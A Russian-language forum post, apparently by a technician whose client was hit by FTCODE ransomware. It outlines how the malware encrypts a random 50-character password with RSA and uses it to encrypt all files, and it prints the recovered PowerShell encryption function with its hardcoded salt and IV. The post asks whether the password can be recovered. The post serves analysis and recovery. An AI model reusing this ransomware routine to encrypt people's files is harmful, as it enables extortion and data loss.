доброго времени суток!!!!
вчера тоже клиента посетила сия дрянь
выцепил с машины исходный код
итак имеем дело вот с чем:
принцип простой
1) генерирует пароль из 50 знаков.
2) шифрует его с помощью ключа RSA-1024 и отдает его в файл (остается в каждой папке) (этот пароль без 2-го ключа не расшифровать, а он у мошенника)
3) далее этим паролем (используя его как Passphrase) шифрует все файлы компа.


function Encrypt-File($item, $Passphrase)
{
$salt="FTCODE hack your system";
$init="FUCKING INIT";
$r = new-Object System.Security.Cryptography.RijndaelManaged;
$pass = [Text.Encoding]::UTF8.GetBytes($Passphrase);
$salt = [Text.Encoding]::UTF8.GetBytes($salt);
$r.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, "SHA1", 5).GetBytes(32);
$r.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($init) )[0..15];
$r.Padding="Zeros";
$r.Mode="CBC";
$c = $r.CreateEncryptor();
$ms = new-Object IO.MemoryStream;
$cs = new-Object Security.Cryptography.CryptoStream $ms,$c,"W rite";
$cs.Write($item, 0,$item.Length);
$cs.Close();
$ms.Close();
$r.Clear();
return $ms.ToArray();
}


Линк на этот код на технете http://gallery.technet.microsoft.com/scriptcenter/PowerShell-Script-410ef9df#content

вот может если пароль как-то подобрать....